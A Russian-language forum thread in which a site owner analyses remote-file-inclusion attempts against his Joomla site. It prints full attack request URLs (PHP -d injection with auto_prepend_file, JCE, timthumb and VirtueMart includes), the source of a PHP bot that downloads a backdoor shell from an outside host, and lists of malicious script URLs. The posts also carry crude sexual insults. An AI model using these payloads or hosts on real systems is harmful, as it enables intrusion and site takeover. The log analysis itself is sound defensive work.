×
Ruby on Rails: постинг твитов через Twitter API (04 нояб 2017)

Практикуемся в Ruby on Rails.

Вопрос Как взламывали Masterpro.ws

Больше
4 года 1 мес. назад - 4 года 6 дн. назад #1 от Aleksej
Aleksej создал эту тему: Как взламывали Masterpro.ws
Оговорюсь сразу; есть планы сделать из небольшого этого сообщения - развернутую статью, предназначенную спецом для тех, кто только-только начинает изучать php либо основы интернет-security. Но пока, в рамках данного топика - лишь перечень предпринятых атак, в основе которых лежит манипулирование get-запросами и попытка удаленного включения некоего скрипта (include), образец которого также приведен.

Оговорка вторая: автор никому и ни в коей мере не рекомендует использовать описанный механизм атак... все, что вы здесь видите - представлено лишь с целью ознакомления. Иными словами - вы читаете данный текст лишь затем, чтобы понять, как делать не нужно.

Не нужно - в силу ряда причин; прежде всего - это не только незаконно, но и представляет из себя, так сказать, моветон маловоспитанного человека и полуграмотного кулхацкера, мнящего себя интернет-гением. Не нужно потому, что, применяя даннный механизм - вы расписываетесь в собственном неумении и непрофессионализме; вы открыто признаете, что более серьезная работа, не базирующаяся на попытках поиска давно закрытых дырок и уязвимостей безопасности - вам не по зубам.

Собственно, предисловие на этом закончено и переходим к деталям. Взгляните, они достаточно поучительны.
Итак, неизвестный злоумышленник предпринимает попытки удаленного включения файла... или, вероятно, попросту пытается прощупать php-директивы неизвестного хостинга:

http://masterpro.ws/?-d+safe_mode=Off+-d+disable_functions=NULL+-d+allow_url_fopen=On+-d+allow_url_include=1+-d+auto_prepend_file=http://florbella.com.br/so.txt

http://masterpro.ws/?-d+safe_mode=Off+-d+disable_functions=NULL+-d+allow_url_fopen=On+-d+allow_url_include=1+-d+auto_prepend_file=http://florbella.com.br/so.txt+-n

Это могло быть даже вот так:

http://masterpro.ws/?-d+allow_url_include=1+-d+auto_prepend_file=http://florbella.com.br/so.txt

или так:

http://www.masterpro.ws/wp-content/themes/eStore/timthumb.php?src=http://picasa.com.rnt.ca/bat.php

Самые любознательные могут набрать в Google что-нибудь вроде поисковой фразы "E-Store SQL Injection Vulnerability", а также по приведенной ссылке загрузить, раскодировать из base64 и попробовать осмыслить содержимое файла с расширением php. Это довольно познавательно.

Или же - можно попытаться отыграть в сторону JCE (очень немало уязвимостей, к слову, этот редактор в свое время мог содержать в своих скриптах, просто на удивление дырявый) либо VirtueMart:

http://www.masterpro.ws/forum//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://picasa.com.buscadordetrabajo.es/cybercrime.php

http://www.masterpro.ws/forum&sa=U&ei=THucUo71L8igtAaC8YCACA&ved=0CJABEBYwFjjIAQ&usg=AFQjCNFc40vYLvdtMx_iyBKU9-St1kri2A//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/update.php

http://www.masterpro.ws/forum/virtuemart//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://picasa.com.buscadordetrabajo.es/cybercrime.php

http://www.masterpro.ws/forum/virtuemart//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.grxuy.com/vv??

http://www.masterpro.ws//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://caoc.cat/idr??

К слову, приходится в очередной раз обратить внимание джумлаводов на то обстоятельство, с каким перманентным постоянством любимый многими JCE-редактор то и дело содержит крайне опасные уязвимости... мне казалось, что так было когда-то, но взгляните, относительно свежие вести с полей и сегодня в полной мере доступны на сайте разработчика либо в виде вот такого рода сообщений на различных интернет-форумах:


В последнее время участились случаи взлома сайтов на Joomla, использующих компонент Joomla Content Editor (com_jce).
Этот компонент имеет уязвимость вплоть до версии 2.0.10, которая позволяет злоумышленнику загружать на сайт произвольные файлы, в том числе, скрипты php.
Для заражения злоумышленники используют робота, который сканирует сайты на предмет наличия компонента jce и имеющейся в нём уязвимости. Наиболее часто встречающиеся симптомы такого заражения:
файлы wp-conf.php в корневой директории сайта ./public_html и в корневой директории аккаунта
файл со случайным названием вида w7792289n.php в ./public_html
многочисленные файлы index.php, залитые в случайные директории сайта
файлы с произвольным названием, в т.ч. с вполне осмысленным, залитые в случайные директории сайта.
Модификация файлов сайта в этом случае не производится, и зловредные файлы легко вычислить по дате изменения. Например, если взлом был осуществлён неделю назад, и если за эту неделю на сайте не менялись php-скрипты, то лечение сводится к следующей команде:
cd public_html
find . -type f -mtime -7 -name "*.php" -delete

Для предотвращения повторного взлома через эту уязвимость следует обновить компонент JCE.



Что именно инклюдится? - вариантов немало. Вы и сами можете, вообщем, взглянуть по содержащимся в коде ссылкам... только не забывайте, содержимое этих скриптов может меняться. Я же здесь приведу самый короткий код из всего увиденного... "Бегемот, покажи нам для начала что-нибудь простенькое", одним словом... взгляните, в случае, если бы попытка удаленного включения такого рода увенчалась успехом - злоумышленник получает полный веб-шелл к вашему аккаунту:

<html><style>
body {font:10pt tahoma;color:#ff0000;background:black;margin:4;font-weight:bold;}
</style><body>
<?php
###[ MQ SPREAD for RFIBot (2.3) ]###
error_reporting(0);
##### CONFIG #####
$mode = $_GET["mode"]; 

$url = 'http://amaecs.com/v/'; //URL path
$src = $url.'com'; //Source Shell
$shell = 'null.php'; //Backdoor PHPShell name
$bot = $url.'bot'; //Source PHPBot

##### SPREAD #####
switch ($mode) {
case "bot":
include($bot);
break;
default:
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);
if(file_exists($exec)){
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);
}
if(!copy($src,$exec)){
die(base64_decode('TVEgU2hlbGx6Og==').' '.$exec.' Failed!');
}
else {
echo base64_decode('TVEgU2hlbGx6Og==').' '.$exec.' Created!';
}
break;
}
?>
</body></html>
<?php die(); ?>


Ну, что же. В преддверии, как уже было сказано, развернутой статьи на тему - буду рад выслушать замечания в контексте приведенных примеров. Если они будут. :)
Последнее редактирование: 4 года 6 дн. назад от p.rishard.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
4 года 6 дн. назад - 4 года 3 дн. назад #2 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Хотелось бы добавить... проанализировав хронику описанных атак - крайне несложно уяснить для себя список наиболее "дырявых" расширений Joomla, чьи уязвимости могут быть поистине гибельны для сайта. Это VirtueMart, JCE, CronoContact. Разумеется, речь идет cугубо о старых версиях extensions, коль скоро дырки известны кулхацкерам - стало быть, давным-давно пофиксены разработчиками данных расширений.

Вашему вниманию - продолжение разговора о различных сценариях атак на сайты под управлением cms Joomla. Добро пожаловать в блог.
Последнее редактирование: 4 года 3 дн. назад от p.rishard.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
3 года 10 мес. назад - 3 года 10 мес. назад #3 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Анонс небольшой публикации на тему в блоге.

Вашему вниманию - статья Внимание, хакерские атаки в вебе . Сценарии стары как мир... но, по-видимому, вполне применимы и сегодня. Взгляните, это перечень web-ресурсов, выуженных мной из логов и содержащих на данный момент (либо в недалеком прошлом) злонамеренный программный код... за подробностями - welcome по ссылке.


http://www.istanbuldenizotobusu.com/update.php
http://picasa.com.deeppowdersnowrider.com/smunfals.php
http://www.grxuy.com/vv??&Itemid=144&option=com_kunena&catid=42&view=category&defaultmenu=145&layout=administrator
http://florbella.com.br/so.txt&option=com_content&view=article&id=1&Itemid=102
http://www.istanbuldenizotobusu.com/update.php&Itemid=144&view=index.php&defaultmenu=145&layout=default
http://ventaspor.com/wp-includes/php/update.php&Itemid=102&view=article&id=0
http://picasa.com.kennethholland.com/bad.php&Itemid=
http://picasa.com.buscadordetrabajo.es/cybercrime.php&Itemid=144&catid=21&view=topic&defaultmenu=145&id=4310&layout=index.php
http://www.basiakonkel.nl/included/php/content/update.php&Itemid=163&option=com_k2&view=item&layout=item&id=21
http://www.zilliontreinamentos.com.br/site/wp-content/php/update.php&Itemid=144&catid=26&view=category&defaultmenu=145&layout=index.php
http://picasa.com.allforbikers.com/seo.php&Itemid=102&option=com_content&view=category&id=0
http://flickr.com.newwybarbie.com/bad.php&Itemid=144&option=com_kunena&catid=26&view=category&defaultmenu=145&wp=file-uploader&layout=themes
http://wordpress.com.seomexicali.com/coreunix.php&Itemid=144&option=com_kunena&catid=25&view=category&defaultmenu=145&wp=content&layout=themes
http://img.youtube.com.gracielascelebraciones.com/myluph.php&Itemid=144&option=com_kunena&catid=25&view=category&defaultmenu=145&wp=content&layout=themes
http://www.basiakonkel.nl/included/php/content/update.php&Itemid=102&view=article&id=0
http://picasa.com.aguiarindustria.com.br/InjectorThimThumb.php&Itemid=102&option=com_content&view=category&id=0
http://gruene-amelinghausen.de/idsjceq//petx.php&Itemid=102&option=com_content&view=article&id=0
http://narmafzar24.ir/update.php&Itemid=144&catid=26&view=category&defaultmenu=145&layout=index.php
http://biberburg-semlin.de/bad.php&Itemid=102&option=com_content&view=category&id=0
http://kpu.cirebonkab.go.id/wp-content/themes/kreview/img/license.php&Itemid=144&view=index.php&defaultmenu=145&layout=default
http://stage-secrets-management.com/includes/php/update.php
Последнее редактирование: 3 года 10 мес. назад от Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
3 года 10 мес. назад - 3 года 10 мес. назад #4 от beginner
beginner ответил в теме Как взламывали Masterpro.ws

Aleksej пишет: Вашему вниманию - статья Внимание, хакерские атаки в вебе .

open_basedir=/путь к каталогу tmp/


Не вполне понятно как правильно прописать open_basedir...
Последнее редактирование: 3 года 10 мес. назад от beginner.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
3 года 10 мес. назад #5 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws

beginner пишет: Не вполне понятно как правильно прописать open_basedir...


For Windows:
open_basedir=/path/to/your/root_folder;/path/to/your/temp_folder;/path/to/your/additional_folder

For Linux:
open_basedir=/path/to/your/root_folder:/path/to/your/temp_folder:/path/to/your/additional_folder

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
3 года 10 мес. назад #6 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Продолжение хроники пикирующего бомбардировщика.

Атаки продолжаются. Все столь же тупые и безрезультатные. Впрочем, судя по приведенному ниже синтаксису - атаки начинает принимать адресный характер; в get-запросах мелькает название шаблона и адрес вот этой самой странички. Кажется, некий анонимный неудачник-двоечник начинает проецировать негатив уже целенаправленно на этот самый сайт, оказавшийся ему явно не по зубам и совершенно не по способностям... негатив в Глобальной Сети - весьма забавная штука; берет начало, как мне кажется, от несколько более успешных попыток подрачить на маменьку в раннем своем детстве.

http://www.masterpro.ws/component/mailto/%3ftmpl=component%26template=jsn_epic_pro%26link=db87c931bb7a536acabfcd10017daed6400d8acf//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/update.php

http://masterpro.ws/forum/25-bezopasnost-sajta-na-joomla/4549-kak-vzlamyvali-masterpro-ws&amp;sa=U&amp;ei=0pPeUuCDFYbOyAGrj4DgCg&amp;ved=0CMUBEBYwJg&amp;usg=AFQjCNHPknpVA9obE1QT0XBxBHTGI9UGdA//wp-content//themes/eStore/timthumb.php?src=http://wordpress.com.xxxvideos.cc/wp-force.php


Я уж думаю, не подсказать ли, в каком направлении порыть, чтобы хоть как-то помочь взломать этот сайт и хоть как-то бедолаге наконец кончить. Впрочем, означенный кулхацкер настолько недееспособен, что навряд ли сумеет эту подсказку понять... я уж не говорю про остальное. Что же, мне остается только поблагодарить за контент для данного топика и пожелать дальнейших успехов... кстати, пользуясь случаем, хотелось бы передать привет его дражайшей маменьке. Интересно, она сейчас все так же игрива, как и в ранней молодости? :laugh:


Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
3 года 10 мес. назад #7 от beginner
beginner ответил в теме Как взламывали Masterpro.ws
не боитесь, что на самом деле ломанут сайт?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
3 года 10 мес. назад - 3 года 10 мес. назад #8 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws

beginner пишет: не боитесь, что на самом деле ломанут сайт?



А вот зараз и проверим, насколько устойчива современная Joomla к хакерским атакам!

А если серьезно - нет, не боюсь.
Взгляните еще раз на запросы:

http://masterpro.ws//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://stage-secrets-management.com/includes/php/update.php
http://www.masterpro.ws/component/mailto//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/update.php


Все, на что хватает у этого идиота мозгов - это пытаться использовать старые, всем известные и давно перекрытые уязвимости. Наудачу; вдруг да повезет найти в Сети своего собрата, такого же бездаря. Придумать что-то свое, поискать самостоятельно - на это знания нужны, мозги опять же. А вот драчить - ума не надо, скопировал на гитхабе скрипт - и привет, типа хакер. Представилась возможность попытаться отбить в Сети те очки, которые безнадежно проиграны в реале, вот чел и ломанулся сквозь бурелом за орденами. Ничего не выйдет, дело закончится, к бурному его удовольствию, мутными пятнами на штанах.
Последнее редактирование: 3 года 10 мес. назад от Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
3 года 9 мес. назад #9 от savage
savage ответил в теме Как взламывали Masterpro.ws
Гы, рад видеть, что тебя еще пока не взломали, aleksej. Не всем так везет, вот у моего работодателя пару сайтов ломанули недавно. :laugh:

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
3 года 9 мес. назад #10 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws

savage пишет: Гы, рад видеть, что тебя еще пока не взломали, aleksej. Не всем так везет, вот у моего работодателя пару сайтов ломанули недавно. :laugh:



Вашими молитвами, savage.
Живем пока, почему бы и нет. Кстати, интенсивность атак сильно снизилась, горе-кулхацкер, походу, выдыхается. А может, мозоли на руках. "Рука бойцов др*чить устала", это если чуть перефразировать классика.

Причем, что интересно. На сайте не одна тысяча страниц... а некоторая, весьма немалая, доля атак нацелена, судя по логам, именно вот на эту самую, с рассказом о бездарном господине, мнящем себя хакером. Не все по зубам такому хакеру, как выясняется.... боги мои, яду мне, яду.. этому чмудаку - joomla, как выясняется, не взломать. Позорище. :laugh:

Я не раз отмечал (ну, знакомых-то немало по жизни, всяких-разных), что именно такие непризнанные горе-специалисты, перенесшие свои амбиции/обидки из реала в инет - на редкость ранимы, до смешного обидчивы. Это объясняет, по логике вещей, многочисленные get-запросы именно к данной странице... что же, добавим еще одну обидку к длинному перечню уже несправедливо нанесенных. Пришло время опубликовать очередной список сайтов, замеченных в нездоровой активности. Повторюсь, вся инфа выужена из логов, убедиться в ее достоверности несложно; нужно лишь посмотреть, что там такое по ссылке. Проверьте лицензию у вашего Каспера, и вперед. Хотелось бы надеяться, что специалистов "отдела К" той или иной страны данный list рано или поздно заинтересует.

http://woutermesker.nl/nicole/wp-content/php/update.php
http://futterlager.at/modules/mod_jce/joomla.php
http://picasa.com.blackwellbusiness.com/bad.php
http://www.escorindo.com/images/demo.php
http://prometals.co.za/update.php
http://www.atlantahometheatresystems.com/wp-includes/images/id.flv???
http://woutermesker.nl/nicole/wp-content/php/update.php
http://picasa.com.kisahnyata.net/up.php
http://picasa.com.abrivshops.com/ThimThumb.php
http://www.basiakonkel.nl/included/php/content/update.php
http://www.rc-roethis.at/rc/php/joomla.php

Увы, список совсем небольшой. Вточняк у парня рука отсыхает. Зато сколько протекло меж пальцев удовольствия! :P

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.